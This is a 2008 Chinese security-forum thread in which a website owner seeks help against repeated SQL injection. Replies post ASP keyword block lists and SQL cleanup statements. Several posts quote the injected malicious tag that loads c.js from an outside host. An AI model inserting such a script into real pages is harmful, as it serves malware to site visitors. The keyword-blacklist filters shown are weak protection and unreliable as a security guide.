网站天天被人SQL注入,要崩溃了,在线求救,重谢! - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛技术交流区 入侵防御（HIPS）网站天天被人SQL注入,要崩溃了,在线求救,重谢!

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

12

1 / 2 页

跳转页

网站天天被人SQL注入,要崩溃了,在线求救,重谢!

本主题由在线技术支持工程师瑞星工程师19 于 2008-12-10 10:27:44 执行合并主题操作

helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:	发表于： 2008-12-04 00:01 \| 只看楼主短消息资料字号：小中大 1楼网站天天被人SQL注入,要崩溃了,在线求救,重谢! 已经在conn.asp中加入了get和post防注入： dim sql_injdata,Sql_Inj,SQL_Get,Sql_DATA SQL_injdata = "'\|and\|exec\|insert\|select\|delete\|update\|count\|\|%\|master\|truncate\|declare\|sysobjects" SQL_inj = split(SQL_Injdata,"\|") If Request.QueryString<>"" Then For Each SQL_Get In Request.QueryString For SQL_Data=0 To Ubound(SQL_inj) if instr(Lcase(Request.QueryString(SQL_Get)),Sql_Inj(Sql_DATA))>0 Then Response.Write "<Script Language=JavaScript>alert('非法注入!');history.back(-1)</Script>" Response.end end if next Next End If 还是被注入了，请高手指点！！！用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)*
helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:	分享到：

helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:	发表于： 2008-12-04 00:02 \| 只看楼主短消息资料字号：小中大 2楼回复 1F helpme2008 的帖子被注入的内容: <Script Src=http://c.nuc%6Cear3.com/css/c.js></Script> 这个人每天注一次，这几天更频繁，我恢复了又被注了，恢复了又被注，我实在受不了了！！！！！！！！！！！！！我的QQ：564341701－
helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:

helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:	发表于： 2008-12-04 18:54 \| 只看楼主短消息资料字号：小中大 3楼最近被SQL注入的朋友们快来联合起来,求管理员置顶,急! 报警网站: http://www.antivirus-china.org.cn 报警邮箱: contact@antivirus-china.org.cn 报警主题及内容: 主题: 上千网站被黑急待处理-被注入c.js(自己的网站名)! 尊敬的国家计算机病毒应急处理中心工作人员: 我是(自己的网站名)的站长,近一个星期每天SQL注入,被注入代码:" <Script Src=http://c.nuc%6Cear3.com/css/c.js> </Script>" 而且每天现在有成千上万的网站还在进一步深受其害,望查明原因, 帮助解决! 站名: 联系人: 联系电话: QQ及邮箱: 用户系统信息：Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
helpme2008 初生襁褓狮帖子:4 注册: 2008-12-04 来自:

Fabregas 叱咤花甲狮帖子:2863 注册: 2008-03-01 来自:	发表于： 2008-12-04 21:46 \| 短消息资料字号：小中大 4楼回复：最近被SQL注入的朋友们快来联合起来,求管理员置顶,急! SQL经常被注入说明存在注入点啊，黑客可以获取到服务器的敏感信息并可远程登录SQL，建议楼主找一些工具扫描一下服务器上存在的注入点吧。
Fabregas 叱咤花甲狮帖子:2863 注册: 2008-03-01 来自:

安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada	发表于： 2008-12-05 10:45 \| 短消息资料字号：小中大 5楼回复：网站天天被人SQL注入,要崩溃了,在线求救,重谢! 该用户帖子内容已被屏蔽
安全初级工程师禁止发言帖子:898 注册: 2007-09-08 来自:Canada

一周搞定cookies 初生襁褓狮帖子:2 注册: 2008-12-09 来自:	发表于： 2008-12-09 10:21 \| 短消息资料字号：小中大 6楼回复: 网站天天被人SQL注入,要崩溃了,在线求救,重谢! 加这段就可以了。 <% '防cookies插入 2008.12.08 Dim Fy_cook,Fy_In,Fy_Inf,Fy_Xh Fy_In = "'\|exec\|insert\|select\|delete\|update\|count\|chr\|truncate\|char\|declare\|--\|script\|\|char\|set\|(\|)\|script\|src\|js" Fy_Inf = split(Fy_In,"\|") '3--------cookies部份------------------- If Request.Cookies<>"" Then For Each Fy_cook In Request.Cookies For Fy_Xh=0 To Ubound(Fy_Inf) If Instr(LCase(Request.Cookies(Fy_cook)),Fy_Inf(Fy_Xh))<>0 Then flyaway3=""&Request.ServerVariables("REMOTE_ADDR")&","&Request.ServerVariables("URL")&"+'cook'+"&Fy_cook&"+"&replace(Request.Cookies(Fy_cook),"'","")&"" response.redirect "http://网站名/" Response.End End If Next Next End If %>
一周搞定cookies 初生襁褓狮帖子:2 注册: 2008-12-09 来自:

银河IT频道初生襁褓狮帖子:2 注册: 2008-12-09 来自:	发表于： 2008-12-09 16:36 \| 短消息资料字号：小中大 7楼回复：网站天天被人SQL注入,要崩溃了,在线求救,重谢! 此网友出现问题后，我们发现了数据库的变化，并开发了一款工具，可以处理数据。此工具可以吧木马写入的链接删除掉，并保持现有库不变，只是处理nvarchar 和ntext类型。 http://it.inhe.net/itfix/DownloadShow.asp?ID=14 http://it.inhe.net/itfix/onewshtml/349_1.html
银河IT频道初生襁褓狮帖子:2 注册: 2008-12-09 来自:

银河IT频道初生襁褓狮帖子:2 注册: 2008-12-09 来自:	发表于： 2008-12-09 16:37 \| 短消息资料字号：小中大 8楼回复：最近被SQL注入的朋友们快来联合起来,求管理员置顶,急! 此网友出现问题后，我们发现了数据库的变化，并开发了一款工具，可以处理数据。此工具可以吧木马写入的链接删除掉，并保持现有库不变，只是处理nvarchar 和ntext类型。 http://it.inhe.net/itfix/DownloadShow.asp?ID=14 http://it.inhe.net/itfix/onewshtml/349_1.html
银河IT频道初生襁褓狮帖子:2 注册: 2008-12-09 来自:

一周搞定cookies 初生襁褓狮帖子:2 注册: 2008-12-09 来自:	发表于： 2008-12-10 08:53 \| 短消息资料字号：小中大 9楼回复: 网站天天被人SQL注入,要崩溃了,在线求救,重谢! navachar update 表名 set 字段名 = replace(字段名,'<Script Src=http://c.%6Euclear3.com/css/c.js></Script>','') ntext update 表名 set 字段名=replace(convert(varchar(8000),字段名),'<Script Src=http://c.%6Euclear3.com/css/c.js></Script>','') -------------------以下可以学习修改表名： ALTER TABLE srcRENAME TO dest; 修改列名： ALTER TABLE tablename RENAME COLUMN src TO dest; 修改列的数据类型： ALTER TABLE tablename MODIFY col VARCHAR2(255); 如果同时需要修改列名和数据类型，则可以先修改数据类型再来修改列名，即执行上述两条sql语句。增加列： ALTER TABLE tablename ADD 列名数据类型删除列： ALTER TABLE tablename DROP COLUMN 列名 C.删除列 ALTER TABLE 表名 DROP COLUMN 列名 D.添加列 ALTER TABLE 表名 ADD 列名 VARCHAR(20) NULL"
一周搞定cookies 初生襁褓狮帖子:2 注册: 2008-12-09 来自:

不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:	发表于： 2008-12-12 12:10 \| 短消息资料字号：小中大 10楼回复：网站天天被人SQL注入,要崩溃了,在线求救,重谢! 我这也是，老是被这个王八蛋注入
不帅的阿桂初生襁褓狮帖子:24 注册: 2008-12-12 来自:

<<上一主题|下一主题>>

12

1 / 2 页

跳转页

页面顶部

Powered by Discuz!NT